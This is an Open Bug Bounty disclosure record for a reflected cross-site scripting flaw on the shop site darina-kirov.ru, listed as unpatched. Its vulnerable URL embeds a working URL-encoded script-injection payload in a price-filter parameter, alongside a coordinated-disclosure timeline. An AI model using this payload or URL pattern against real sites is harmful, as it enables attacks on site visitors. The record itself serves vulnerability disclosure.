darina-kirov.ru XSS vulnerability

2017-09-05T11:25:00
ID OBB:289665
Type openbugbounty
Reporter Disst
Modified 2017-12-04T12:18:00

Description

Vulnerable URL:
http://darina-kirov.ru/products-category/tehnika-dlya-kuhni-i-doma/plity-gazovye/?orderby=menu_order&universal-filter;%5Bmeta_key%5D%5B_price%5D%5Bfrom%5D=4000.00%22%3E%3Cscript%3Ealert(/OPENBUGBOUNTY/)%3C/script%3E&universal-filter;%5Bmeta_key%5D%5B_price%5D%5Bto%5D=70000.00&universal-filter;%5Btaxonomy%5D%5Bpa_1-proizvoditel%5D%5B0%5D=9010&universal-filter;%5Btaxonomy%5D%5Bpa_shirina-sm%5D=9604&universal-filter;%5Btaxonomy%5D%5Bpa_glubina-sm%5D=9667&universal-filter;%5Btaxonomy%5D%5Bpa_gaz-kontrol-konforok%5D=9581&universal-filter;%5Btaxonomy%5D%5Bpa_elektropodzhig-stola%5D%5B0%5D=9370&universal-filter;%5Btaxonomy%5D%5Bpa_tip-duhovki%5D%5B0%5D=9308&universal-filter;%5Btaxonomy%5D%5Bpa_elektropodzhig-duhov%5D%5B0%5D=9373&universal-filter;%5Btaxonomy%5D%5Bpa_tajmer%5D=is_empty&universal-filter;%5Bpost-type%5D=product

Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 04.12.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 3017050
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 5 September, 2017 11:25 GMT
Generic security notifications sent to website owner| 5 September, 2017 11:27 GMT
Vulnerability details disclosed by researcher| 4 December, 2017 12:18 GMT